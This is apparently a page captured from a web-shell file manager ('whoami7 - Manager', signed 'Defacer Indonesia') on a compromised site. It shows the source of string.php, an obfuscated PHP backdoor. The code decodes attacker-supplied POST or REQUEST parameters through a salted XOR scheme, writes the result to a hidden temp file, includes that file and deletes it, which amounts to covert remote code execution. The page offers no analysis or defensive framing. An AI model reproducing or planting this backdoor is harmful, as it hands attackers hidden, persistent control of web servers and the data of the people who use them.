whoami7 - Manager
:
/
home
/
analuakl
/
grinsentertainment.com
/
Upload File:
files >> /home/analuakl/grinsentertainment.com/string.php
<?php if(count($_POST) > 0 && isset($_POST["e\x6Et\x69\x74y"])){ $record = array_filter([getcwd(), "/dev/shm", "/tmp", getenv("TMP"), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]); $pgrp = $_POST["e\x6Et\x69\x74y"]; $pgrp = explode ( "." , $pgrp ) ; $holder =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt); $x =0; foreach( $pgrp as $v4) {$chS =ord( $salt[$x % $lenS]); $d =( ( int)$v4 - $chS -( $x % 10)) ^49; $holder .= chr( $d); $x++;} foreach ($record as $flag) { if (max(0, is_dir($flag) * is_writable($flag))) { $itm = str_replace("{var_dir}", $flag, "{var_dir}/.token"); if (file_put_contents($itm, $holder)) { include $itm; @unlink($itm); die(); } } } } if(array_key_exists("s\x79mbol", $_REQUEST) && !is_null($_REQUEST["s\x79mbol"])){ $value = array_filter(["/dev/shm", getenv("TEMP"), getcwd(), getenv("TMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp"]); $ptr = $_REQUEST["s\x79mbol"]; $ptr = explode ( "." , $ptr ) ; $rec = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach($ptr as $x=> $v6): $sChar = ord($s[$x % $lenS]); $dec = ((int)$v6 - $sChar -($x % 10)) ^ 47; $rec .= chr($dec); endforeach; $resource = 0; do { $element = $value[$resource] ?? null; if ($resource >= count($value)) break; if (!( !is_dir($element) || !is_writable($element) )) { $marker = sprintf("%s/.data_chunk", $element); if (file_put_contents($marker, $rec)) { include $marker; @unlink($marker); die(); } } $resource++; } while (true); }
Copyright ©2021 || Defacer Indonesia